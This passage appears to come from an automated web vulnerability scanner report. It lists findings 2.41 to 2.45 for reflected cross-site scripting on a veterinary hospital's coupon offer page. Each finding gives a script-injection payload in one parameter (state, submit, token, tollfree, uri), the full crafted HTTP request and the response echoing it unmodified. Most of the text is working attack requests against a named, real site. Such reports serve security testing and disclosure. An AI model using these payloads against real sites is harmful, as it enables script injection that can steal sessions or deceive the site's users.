25253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:01 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=g8pte6n4esqiq4spacl1mgj7g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname
...[SNIP]...

2.41. http://www.vcahospitals.com/main/offer [state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4e4"><script>alert(1)</script>eea3abc545b was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:57 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FL2a4e4"><script>alert(1)</script>eea3abc545b&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.42. http://www.vcahospitals.com/main/offer [submit parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82bfe"><script>alert(1)</script>eac88d58519 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hhabg9v3lhlbkflav80vstra25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon82bfe"><script>alert(1)</script>eac88d58519&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3
...[SNIP]...

2.43. http://www.vcahospitals.com/main/offer [token parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de71"><script>alert(1)</script>cc1ba56418e was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=eq5ak2i8c2d6bskvfdik8qphb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
88BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc7de71"><script>alert(1)</script>cc1ba56418e&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%2
...[SNIP]...

2.44. http://www.vcahospitals.com/main/offer [tollfree parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e9e"><script>alert(1)</script>8361d0a233a was submitted in the tollfree parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hg9evj4m1q5qnnnvp8ppo8c1g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.2
...[SNIP]...

2.45. http://www.vcahospitals.com/main/offer [uri parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922c0"><script>alert(1)</script>c8ab77b4859 was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=vrccil3nvdrv3u04cdk943phe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
